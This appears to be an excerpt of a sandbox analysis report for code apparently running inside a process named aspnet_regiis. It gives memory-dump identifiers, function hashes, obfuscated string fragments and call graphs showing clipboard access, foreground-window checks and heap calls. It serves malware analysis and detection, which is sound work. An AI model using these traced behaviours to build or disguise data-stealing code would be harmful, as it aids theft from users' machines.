                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 18ab382b34df849cfd1728ba1100c21cfe7ed371d5b0db93386a83a98c7019bc
                                                                                                                                                                                                              • Instruction ID: e01c3caf4286443d9221cbbd8d9960e22417e6c1f29c704a8aafc44b2cade043
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 18ab382b34df849cfd1728ba1100c21cfe7ed371d5b0db93386a83a98c7019bc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5FD09E7AA059118F8724CF42C54156173B2BBDA308B37E245C50123315C23998029E89
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 8c9d01703a47a8ffbfc6c21441a15825aaf35710545836d107ae9ddcf8847010
                                                                                                                                                                                                              • Instruction ID: 9edea6a4650322b64d6f0865214c87e6513d468613e27dfc09e02cf77f91c668
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8c9d01703a47a8ffbfc6c21441a15825aaf35710545836d107ae9ddcf8847010
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A1900231F496028EC1008D018141679E279638F101F32F100801C3320A4634D401455C
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocString
                                                                                                                                                                                                              • String ID: ,$,$-$0$;$?$?$@$B$C$C$F$N$Q$R$U$U$Z$_$h$j$m$n$o$t$x${
                                                                                                                                                                                                              • API String ID: 2525500382-2354671896
                                                                                                                                                                                                              • Opcode ID: af285fb1c2db982d4656b6643cac3124af5a068330fa940b1e86940d7aad0d16
                                                                                                                                                                                                              • Instruction ID: c25be7ee82659bd805004673a6b840706ddb041967c7f1fc099671d325a07149
                                                                                                                                                                                                              • Opcode Fuzzy Hash: af285fb1c2db982d4656b6643cac3124af5a068330fa940b1e86940d7aad0d16
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1491E52050C7C689D332C63C88487DFBFD16BA3324F188BADD1E99A6D2D6B5454A8763
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MetricsSystem
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4116985748-3916222277
                                                                                                                                                                                                              • Opcode ID: d023611836159c4575499bbe0896b333153e449338bc2bf6ace3ece46f1f5d8b
                                                                                                                                                                                                              • Instruction ID: 0f54778499a46555ecfaa67cb3c896f3b561a13f6ba4b3b68c5689cf62dcd68b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d023611836159c4575499bbe0896b333153e449338bc2bf6ace3ece46f1f5d8b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 973192B09153458FDB00EFADDA8561DBBF1BB88304F11892DE498EB354D774A949CF82

                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                              Execution Coverage:2.5%
                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                                                                              Total number of Nodes:40
                                                                                                                                                                                                              Total number of Limit Nodes:3
                                                                                                                                                                                                              execution_graph 13069 77098cab 13070 77098cc0 13069->13070 13070->13070 13073 77098a80 LdrInitializeThunk 13070->13073 13072 7709905c 13073->13072 13074 77098deb GetForegroundWindow 13075 77098df9 13074->13075 13076 77098e4a 13077 77098e90 13076->13077 13079 77099a2e 13077->13079 13080 77098a80 LdrInitializeThunk 13077->13080 13080->13079 13098 770688f0 13100 770688fc 13098->13100 13099 77068cb8 ExitProcess 13100->13099 13101 77068911 GetCurrentThreadId 13100->13101 13105 77068b21 13100->13105 13102 77068944 GetForegroundWindow 13101->13102 13103 7706893e 13101->13103 13104 77068b28 GetCurrentProcessId 13102->13104 13102->13105 13103->13102 13104->13105 13105->13099 13081 77099461 13082 77099460 13081->13082 13082->13081 13085 7709946e 13082->13085 13088 77098a80 LdrInitializeThunk 13082->13088 13084 7709954e 13085->13084 13087 77098a80 LdrInitializeThunk 13085->13087 13087->13084 13088->13085 13106 77099191 13108 770990c2 13106->13108 13107 7709921f 13108->13106 13108->13107 13108->13108 13111 77098a80 LdrInitializeThunk 13108->13111 13110 77099247 13111->13110 13117 77095592 13118 770955a0 RtlFreeHeap 13117->13118 13119 770955e5 13117->13119 13118->13119 13089 770989a6 13090 77098a5c 13089->13090 13091 770989b4 13089->13091 13092 77098a62 13089->13092 13095 770954e0 13090->13095 13091->13092 13094 77098a44 RtlReAllocateHeap 13091->13094 13094->13092 13096 77095500 13095->13096 13096->13096 13097 7709553c RtlAllocateHeap 13096->13097

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.1508390179.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000A.00000002.1508363085.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.1508432515.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.1508498829.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.1508566409.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CurrentProcess$ExitForegroundThreadWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3118123366-0
                                                                                                                                                                                                              • Opcode ID: 6dce6c2772ad35a639c35bd617511c35370b1d52e9e13eb22ec5c5f03ff324af
                                                                                                                                                                                                              • Instruction ID: 2cf4330462fd01937703cc933884298f55a2cb230d44ef635a32ba07e8f6fbfd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6dce6c2772ad35a639c35bd617511c35370b1d52e9e13eb22ec5c5f03ff324af
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 17A1F473B587054FC308DE6DCD9235AF7D7ABC8620F1AC53EA499DB3A0EA74D8054A81

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 171 770989a6-770989ad 172 77098a5c-77098a5d call 770954e0 171->172 173 770989c2-770989df 171->173 174 770989b4-770989bb 171->174 175 77098a64-77098a6d call 77095570 171->175 181 77098a62 172->181 176 770989e0-77098a42 173->176 174->173 174->175 182 77098a6f-77098a76 175->182 176->176 180 77098a44-77098a5a RtlReAllocateHeap 176->180 180->182 181->182
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 77098A54
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.1508390179.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000A.00000002.1508363085.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.1508432515.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.1508498829.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.1508566409.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                              • Opcode ID: 1e2eff99bc323ece2bce2724e07f112b9bd34e19d2508d9f2291f36a5e1d85a5
                                                                                                                                                                                                              • Instruction ID: 930f272c652cabe0d37780e5d094ec41581fb17b995b44d94ea99aaa0284aba5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1e2eff99bc323ece2bce2724e07f112b9bd34e19d2508d9f2291f36a5e1d85a5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8111227BB116028FDB058EA9DC95785BBB0BF09250F0906B5D540CB282D6BDC9058BC6

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 183 770954e0-770954f9 184 77095500-7709553a 183->184 184->184 185 7709553c-77095554 RtlAllocateHeap 184->185
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 77095548
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.1508390179.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000A.00000002.1508363085.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.1508432515.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.1508498829.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.1508566409.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                              • Opcode ID: 8b6608dfb18c37a44a6178fd66f7822262ea2136826dd61ba946a946bd45b144
                                                                                                                                                                                                              • Instruction ID: 74b10138d714617ac4d760ec5b5be82db6f1dc3346a70a62783c6fb8429a88b1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8b6608dfb18c37a44a6178fd66f7822262ea2136826dd61ba946a946bd45b144
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B7F02B712943426FC319DE56ECD2E5F3BAFD789211F29086CE9CA97340C5244C01C795

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 186 77095592-77095599 187 770955a0-770955b2 186->187 188 770955e5-770955ea 186->188 189 770955c0-770955d2 187->189 189->189 190 770955d4-770955df RtlFreeHeap 189->190 190->188
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(?,00000000), ref: 770955DF
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.1508390179.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000A.00000002.1508363085.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.1508432515.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.1508498829.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.1508566409.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FreeHeap
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3298025750-0
                                                                                                                                                                                                              • Opcode ID: 845b6927e26f67012d5a0918a562faa1fc9e0597bfbaef7634a59e952ace598e
                                                                                                                                                                                                              • Instruction ID: 962367ebf9f47c9d3979d4e0aeb522cd70ca9cfb6fa852a9830ef2db9eb348f4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 845b6927e26f67012d5a0918a562faa1fc9e0597bfbaef7634a59e952ace598e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8BF0EC302452429FE7018B32CC207543B22EB86308F3880A8D0140AAE2C6364823D650

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 191 77098deb-77098df4 GetForegroundWindow call 7709c460 193 77098df9-77098e23 191->193
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 77098DEB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.1508390179.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000A.00000002.1508363085.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.1508432515.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.1508498829.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.1508566409.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ForegroundWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2020703349-0
                                                                                                                                                                                                              • Opcode ID: c8d77618245ec073f58971acfe50834a06a78affad5c321cb2682e5d63cbc133
                                                                                                                                                                                                              • Instruction ID: a388ef1a4fda71c8a731ebe160047227a75187356461cb04f412b18f7a5057e6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8d77618245ec073f58971acfe50834a06a78affad5c321cb2682e5d63cbc133
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F9D0127BB512009FEA044939DD4729637D3D396256B1A4424D042D274CD93C99458A46

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 194 77098a80-77098ab2 LdrInitializeThunk
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LdrInitializeThunk.NTDLL(7709C62B,005C003F,0000000B,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 77098AAE
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.1508390179.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000A.00000002.1508363085.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.1508432515.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.1508498829.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.1508566409.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                              • Opcode ID: ad932b2b00559e9cb24108de1499e2b8809661d28f6ef4b94d1e3dfa2d030c47
                                                                                                                                                                                                              • Instruction ID: 88b266f08c8d8dc656098dc4a5309144cffe720ba9f358246b073a6e310c2786
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ad932b2b00559e9cb24108de1499e2b8809661d28f6ef4b94d1e3dfa2d030c47
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 47E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.1508390179.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000A.00000002.1508363085.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.1508432515.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.1508498829.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.1508566409.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Uninitialize
                                                                                                                                                                                                              • String ID: $.r$6 4z$Q\Jd$WXOL$[wy$_&%g$tefo$}LfB
                                                                                                                                                                                                              • API String ID: 3861434553-1810505438
                                                                                                                                                                                                              • Opcode ID: f379de26e7ad978bfe98ccb3375c5b5927a73b7a1544bc0efebf64596969fea6
                                                                                                                                                                                                              • Instruction ID: fb582b36e9e4e7a5e24dcde7cd9611cd0d2ec5d772cf44dfceaa7f6d54af3e39
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f379de26e7ad978bfe98ccb3375c5b5927a73b7a1544bc0efebf64596969fea6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2BB125B51057818FD31A8F6AC4A5762BFF2BF56300B2985ACC4D68F3A6C7768406CF50
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.1508390179.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000A.00000002.1508363085.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.1508432515.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.1508498829.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.1508566409.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: x{$srq
                                                                                                                                                                                                              • API String ID: 0-2442905896
                                                                                                                                                                                                              • Opcode ID: 2787ddbe0a3be674349877ad4e1b49a6fe4bdca547d5c98e208a0d3d847ee810
                                                                                                                                                                                                              • Instruction ID: 5959acc913209b6f103f205f9a75e9f0781e8df8cf06217b4e35ac78025cf07f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2787ddbe0a3be674349877ad4e1b49a6fe4bdca547d5c98e208a0d3d847ee810
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 45F198B16093458FD700CF15C89166BBBF2EF86B14F148A2CF5969B391E3788906CB96
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.1508390179.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000A.00000002.1508363085.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.1508432515.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.1508498829.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.1508566409.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocString
                                                                                                                                                                                                              • String ID: ,$,$-$0$;$?$?$@$B$C$C$F$N$Q$R$U$U$Z$_$h$j$m$n$o$t$x${
                                                                                                                                                                                                              • API String ID: 2525500382-2354671896
                                                                                                                                                                                                              • Opcode ID: af285fb1c2db982d4656b6643cac3124af5a068330fa940b1e86940d7aad0d16
                                                                                                                                                                                                              • Instruction ID: c25be7ee82659bd805004673a6b840706ddb041967c7f1fc099671d325a07149
                                                                                                                                                                                                              • Opcode Fuzzy Hash: af285fb1c2db982d4656b6643cac3124af5a068330fa940b1e86940d7aad0d16
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1491E52050C7C689D332C63C88487DFBFD16BA3324F188BADD1E99A6D2D6B5454A8763
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.1508390179.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000A.00000002.1508363085.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.1508432515.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.1508498829.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.1508566409.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                                                                                                              • String ID: @$O$Q$R$T
                                                                                                                                                                                                              • API String ID: 2832541153-3006032178
                                                                                                                                                                                                              • Opcode ID: 661d4773080fd1411e0c1233766135bc5cf7973d414c416f0342737e6e7d30d3
                                                                                                                                                                                                              • Instruction ID: 473e71294c898bbdd95aa9b198209c6be9a42bcdb57dc1235951fce72e34c101
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 661d4773080fd1411e0c1233766135bc5cf7973d414c416f0342737e6e7d30d3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F751F4B2C083958FDB01ABB8994839EBFF0AB19214F054639D4D4E73C6D3798555CBA3
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.1508390179.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000A.00000002.1508363085.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.1508432515.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.1508498829.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.1508566409.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MetricsSystem
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4116985748-3916222277
                                                                                                                                                                                                              • Opcode ID: 42d9b0c1402504cb904485db410f3b42bd2ed86c7012387e9739c7f0c9e63fbb
                                                                                                                                                                                                              • Instruction ID: a0c9c6d44399aeab959e9a7abba2df1e8e511a10c746f454140a89791bbfa969
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 42d9b0c1402504cb904485db410f3b42bd2ed86c7012387e9739c7f0c9e63fbb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4E5180B1E152098FDB40EFACDA85A9EBBF1BF48300F114569E898E7350D734A945CF92
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.1508390179.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000A.00000002.1508363085.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.1508432515.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.1508498829.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.1508566409.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MetricsSystem
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4116985748-3916222277
                                                                                                                                                                                                              • Opcode ID: d023611836159c4575499bbe0896b333153e449338bc2bf6ace3ece46f1f5d8b
                                                                                                                                                                                                              • Instruction ID: 0f54778499a46555ecfaa67cb3c896f3b561a13f6ba4b3b68c5689cf62dcd68b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d023611836159c4575499bbe0896b333153e449338bc2bf6ace3ece46f1f5d8b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 973192B09153458FDB00EFADDA8561DBBF1BB88304F11892DE498EB354D774A949CF82